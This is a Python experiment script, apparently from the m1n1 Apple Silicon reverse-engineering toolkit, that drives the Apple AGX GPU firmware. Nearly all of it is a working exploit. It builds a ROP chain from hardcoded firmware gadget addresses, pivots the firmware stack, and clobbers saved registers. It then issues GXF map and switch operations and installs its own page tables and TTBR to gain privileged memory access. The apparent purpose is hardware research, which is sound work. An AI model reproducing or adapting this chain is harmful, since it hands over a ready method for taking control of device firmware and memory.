m1n1/proxyclient/experiments/agx_xtest.py

417 lines
12 KiB
Python
Raw Permalink Normal View History

#!/usr/bin/env python3
# SPDX-License-Identifier: MIT
import sys, pathlib, time
sys.path.append(str(pathlib.Path(__file__).resolve().parents[1]))
import atexit, sys
from m1n1.agx import AGX
from m1n1.agx.render import *
from m1n1.fw.agx.microsequence import *
from construct import *
from m1n1.setup import *
from m1n1 import asm
p.pmgr_adt_clocks_enable("/arm-io/gfx-asc")
p.pmgr_adt_clocks_enable("/arm-io/sgx")
agx = AGX(u)
agx.mon = mon
sgx = agx.sgx_dev
def magic(renderer, work, ms):
work.scratch = agx.kobj.new_buf(0x4000, name="scratch", track=True)
# dump GXF area
#for i in range(0, 0x200, 8):
#ms.append(Read64Cmd(0xffffff8000068000 + i))
#ms.append(Store64Cmd(work.scratch._addr + i))
#return
gbl_cur_cmd_state = 0xffffff80000744b0
v_gptbat_base = 0xffffff800004d06b
v_kpt_pfn = 0xffffff80000680b0
g_epilogue = 0xffffff8000021ec0
sp = 0xffffff80000baab0 + 0x1c0
v_lr = sp + 0x58
v_x26 = sp + 0x10
v_x23 = sp + 0x28
v_x22 = sp + 0x30
v_x21 = sp + 0x38
g_stack_pivot = 0xffffff8000006640
#0xffffff8000006640 : mov sp, x2 ; movz x0, #0x1 ; ret
g_calltwo = 0xffffff8000045e24
# 0xffffff8000045e24 :
# ldr x8, [x22] ; ldr x8, [x8] ; mov x0, x22 ; movz w1, #0x5 ; mov x2, x23 ; mov x3, #0x0 ; blr x8 ;
g_callone = 0xffffff8000045e3c
# ldr x8, [x21, #0x70] ; cbz x8, #0xffffff8000045e4c ; mov x0, x26 ; blr x8
# mov x0, x23 ;
# ldp x29, x30, [sp, #0x80] ;
# ldp x20, x19, [sp, #0x70] ;
# ldp x22, x21, [sp, #0x60] ;
# ldp x24, x23, [sp, #0x50] ;
# ldp x26, x25, [sp, #0x40] ;
# ldp x28, x27, [sp, #0x30] ;
# ldp d9, d8, [sp, #0x20] ;
# add sp, sp, #0x90 ; ret
g_store = 0xffffff800003b310
# 0xffffff800003b310 : str x0, [x23, #0xa78] ; ldp x29, x30, [sp, #0x40] ; ldp x20, x19, [sp, #0x30] ; ldp x22, x21, [sp, #0x20] ; ldp x24, x23, [sp, #0x10] ; ldp x26, x25, [sp], #0x50 ; ret
g_mmu_gxf_enter = 0xffffff8000006650
ROP_SIZE = 0x400
rbuf = agx.kobj.new(Array(ROP_SIZE, Int64ul), name="ROP", track=True)
p_rop = rbuf._addr
rop = []
def r(i):
p = p_rop + len(rop) * 8
rop.append(i)
return p
def e(v):
p = p_rop + len(rop) * 8
rop.extend(v)
return p
tmp_cmdbuf = r(0)
pg_stack_pivot = r(g_stack_pivot)
ppg_stack_pivot = r(pg_stack_pivot)
pg_store = r(g_store)
pg_epilogue = r(g_epilogue)
pg_mmu_gxf_enter = r(g_mmu_gxf_enter)
v_ttbrs = 0xffffff8001000000
v_ttbr1_63 = v_ttbrs + 63 * 16
gxf_map_args = e([
v_ttbrs >> 14, # va
0, # pa
1, # size
0x41b, # EL1 RW Shared
0, # unk
])
gxf_map_op = e([
0x10, # map
gxf_map_args
])
gxf_switch_args = e([
63 << 32, # context ID
])
gxf_switch_op = e([
0x20, # switch
gxf_switch_args
])
if len(rop) & 1:
r(0)
# Low leaf PT for firmware
v_kpt0 = 0xffffff8001fc8000
# New page tables (AGX heap scratch)
# Actually make this the TTBR page lol
v_new_pt = 0xffffff80000b4000
new_sp = e([
# Set the TTBR1 for context 63
# Coming from g_calltwo
0x0aaaaaaaaa000006,
0x0aaaaaaaaa000007,
0x0aaaaaaaaa000008,
0x0aaaaaaaaa000009,
0x0aaaaaaaaa00000a,
0x0aaaaaaaaa00000b,
0x0bbbbbbbbb000028, # x28
0x0bbbbbbbbb000027, # x27
])
new_ttbr = e([
0x1bbbbbbbbb000026, # x26 = x0 = value
0x1bbbbbbbbb000025, # x25
0x1bbbbbbbbb000024, # x24
v_ttbr1_63 - 0xa78, # x23 = addr
0x1bbbbbbbbb000022, # x22
pg_store - 0x70, # x21 = func
0x1bbbbbbbbb000020, # x20
0x1bbbbbbbbb000019, # x19
0x1bbbbbbbbb000029, # x29
g_callone, # lr
# Switch to context 63
# Coming from g_store
gxf_switch_op, # x26 = x0 = op
0x2bbbbbbbbb000025, # x25
0x2bbbbbbbbb000024, # x24
0x2bbbbbbbbb000023, # x23
0x2bbbbbbbbb000022, # x22
pg_mmu_gxf_enter - 0x70, # x21 = func
0x2bbbbbbbbb000020, # x20
0x2bbbbbbbbb000019, # x19
0x2bbbbbbbbb000029, # x29
g_callone, # lr
# Install our page table in the kernel space
# Coming from g_callone
0x3aaaaaaaaa000006,
0x3aaaaaaaaa000007,
0x3aaaaaaaaa000008,
0x3aaaaaaaaa000009,
0x3aaaaaaaaa00000a,
0xaaaaaaaaaa00000b,
0x3bbbbbbbbb000028, # x28
0x3bbbbbbbbb000027, # x27
])
ktp_pte_val = e([
0x3bbbbbbbbb000026, # x26 = x0 = value
0x3bbbbbbbbb000025, # x25
0x3bbbbbbbbb000024, # x24
])
kpt_pte_addr = e([
0x3bbbbbbbbb000023, # x23 = addr
0x3bbbbbbbbb000022, # x22
pg_store - 0x70, # x21 = func
0x3bbbbbbbbb000020, # x20
0x3bbbbbbbbb000019, # x19
0x3bbbbbbbbb000029, # x29
g_callone, # lr
])
def restore_reg(p):
return e([
# Restore x21
# Coming from g_store
0x4bbbbbbbbb000026, # x26 = x0 = value
0x4bbbbbbbbb000025, # x25
0x4bbbbbbbbb000024, # x24
p - 0xa78, # x23 = addr
0x4bbbbbbbbb000022, # x22
pg_store - 0x70, # x21 = function
0x4bbbbbbbbb000020, # x20
0x4bbbbbbbbb000019, # x19
0x4bbbbbbbbb000029, # x29
g_callone, # lr
])
save_x21 = restore_reg(v_x21)
save_x22 = restore_reg(v_x22)
save_x23 = restore_reg(v_x23)
save_x26 = restore_reg(v_x26)
save_lr = restore_reg(v_lr)
e([
# Return to original stack
# Coming from g_store
0, # x26 = r0 = ret
0x5bbbbbbbbb000025, # x25
0x5bbbbbbbbb000024, # x24
sp, # x23 = new sp
ppg_stack_pivot, # x22 = 1st function
pg_epilogue - 0x70, # x21 = 2nd function
0x5bbbbbbbbb000020, # x20
0x5bbbbbbbbb000019, # x19
0x5bbbbbbbbb000029, # x29
g_calltwo, # lr
])
print(f"ROP len: {len(rop)*8:#x}")
rbuf.val = rop + [0] * (ROP_SIZE - len(rop))
rbuf.push()
# Calculate pfn of the ttbr base
vpg_ttbrs = gxf_map_args + 8
ms.append(Read64Cmd(v_gptbat_base))
ms.append(ALUCmd(ALUCmd.LSR, 14))
ms.append(Store64Cmd(vpg_ttbrs))
# Calculate physaddr of the kpte to overwrite
ms.append(Read64Cmd(v_kpt_pfn))
ms.append(ALUCmd(ALUCmd.LSL, 14))
ms.append(ALUCmd(ALUCmd.XOR, 0xffffffffffffffff))
ms.append(Add16Cmd(0xa78 - 8 * 4))
ms.append(ALUCmd(ALUCmd.XOR, 0xffffffffffffffff))
ms.append(Store64Cmd(kpt_pte_addr))
# Read the page tables to find the paddr of our new PT,
# and generate the PTE and TTBR
# pt[0] -> self reference L1 -> L2
ms.append(Read64Cmd(v_kpt0 + ((v_new_pt >> 14) & 0x7ff) * 8))
ms.append(ALUCmd(ALUCmd.AND, 0xfffffffc000))
ms.append(ALUCmd(ALUCmd.OR, 1))
ms.append(Store64Cmd(new_ttbr))
ms.append(ALUCmd(ALUCmd.OR, 2))
ms.append(Store64Cmd(ktp_pte_val))
ms.append(Store64Cmd(v_new_pt))
# Map physical 32M pages at 0, 32M, 8G-32, 16G-32
# This should be enough to make the exploit work regardless of RAM size,
# the shader can map the rest
for page in (0, 1, 255, 511):
# pt[0x400+x] -> 0x800000000 + (x<<25)
ms.append(Write64Cmd(v_new_pt + 0x2000 + 8 * page, 0xe0000800000409 | (page<<25)))
# Save the stack values we will clobber,
# and construct the new ttbr0 PT
for src, dest in (
(v_lr, save_lr),
(v_x21, save_x21),
(v_x22, save_x22),
(v_x23, save_x23),
(v_x26, save_x26),
):
ms.append(Read64Cmd(src))
ms.append(Store64Cmd(dest))
# Set up our initial ROP pivot (GXF map TTBRs)
ms.append(Write64Cmd(v_x21, pg_mmu_gxf_enter - 0x70))
ms.append(Write64Cmd(v_x22, ppg_stack_pivot))
ms.append(Write64Cmd(v_x23, new_sp))
ms.append(Write64Cmd(v_x26, gxf_map_op))
ms.append(Write64Cmd(v_lr, g_calltwo))
# Figure out the stamp addr/val to complete the current command
ms.append(Read64Cmd(gbl_cur_cmd_state))
ms.append(Add16Cmd(0x10))
store_cmd_buf = Store64Cmd(0)
ms.append(store_cmd_buf)
store_cmd_buf.addr = ms.cur_addr() + Read64Cmd.offsetof("addr")
ms.append(Read64Cmd(0))
ms.append(ALUCmd(ALUCmd.AND, 0xffffffffffffffe0))
ms.append(Store64Cmd(tmp_cmdbuf))
off_3d_stamp_addr = 0x8d8
off_3d_stamp_value = 0x8e0
off_3d_stamp_index = 0x8e4
off_ta_stamp_addr = 0x578
off_ta_stamp_value = 0x580
off_ta_stamp_index = 0x584
ms.append(Add16Cmd(off_ta_stamp_addr))
store = Store64Cmd(0)
ms.append(store)
store.addr = ms.cur_addr() + Read64Cmd.offsetof("addr")
ms.append(Read64Cmd(0))
store_stamp_addr = Store64Cmd(0)
ms.append(store_stamp_addr)
ms.append(Read64Cmd(tmp_cmdbuf))
ms.append(Add16Cmd(off_ta_stamp_value))
store = Store64Cmd(0)
ms.append(store)
store.addr = ms.cur_addr() + Read32Cmd.offsetof("addr")
ms.append(Read32Cmd(0))
store_stamp_val = Store64Cmd(0)
ms.append(store_stamp_val)
ms.append(DoorbellCmd(1))
off = ms.cur_addr()
store_stamp_addr.addr = off + CompleteCmd.offsetof("stamp_addr")
store_stamp_val.addr = off + CompleteCmd.offsetof("stamp_val")
cmd = CompleteCmd()
cmd.stamp_addr = 0
cmd.stamp_val = 0
ms.append(cmd)
#off = ms.cur_addr()
#store_stamp_addr.addr = off + AbortCmd.offsetof("stamp_addr")
#store_stamp_val.addr = off + AbortCmd.offsetof("stamp_val")
#cmd = AbortCmd()
#cmd.stamp_addr = 0
#cmd.stamp_val = 0
#ms.append(cmd)
ms.append(Write64Cmd(0xdead, 0))
try:
agx.start()
#agx.uat.dump(0)
print("==========================================")
print("## After init")
print("==========================================")
mon.poll()
agx.poll_objects()
ctx = GPUContext(agx)
ctx.bind(2)
f = GPUFrame(ctx, sys.argv[1], track=False)
r = GPURenderer(ctx, 8, bm_slot=0x10, queue=1)
print("==========================================")
print("## Submitting")
print("==========================================")
r.mshook_ta = magic
w = r.submit(f.cmdbuf)
print("==========================================")
print("## Submitted")
print("==========================================")
mon.poll()
agx.poll_objects()
print("==========================================")
print("## Run")
print("==========================================")
r.run()
while not r.ev_ta.fired:
agx.asc.work()
agx.poll_channels()
#r.wait()
agx.poll_objects()
print("==========================================")
print("## Scratch")
print("==========================================")
#chexdump(w.scratch.pull().val)
#print(hex(w.scratch.pull().val))
#open("68000.dump", "wb").write(w.scratch.pull().val)
time.sleep(1)
agx.poll_channels()
agx.kick_firmware()
agx.asc.work()
agx.asc.work()
agx.poll_channels()
#agx.asc.crash.crash_hard()
#agx.poll_channels()
time.sleep(1)
agx.poll_channels()
agx.asc.work()
agx.asc.work()
agx.poll_channels()
w = r.submit(f.cmdbuf)
r.run()
time.sleep(1)
agx.poll_channels()
finally:
mon.poll()
agx.poll_objects()
agx.uat.invalidate_cache()
print(repr(agx.uat.iotranslate(0, 0xffffff8001000000, 0x10)))
#print("UAT dump:")
#agx.uat.dump(0)
#print(f"Val: {p.read64(0x810000000):#x}")
p.reboot()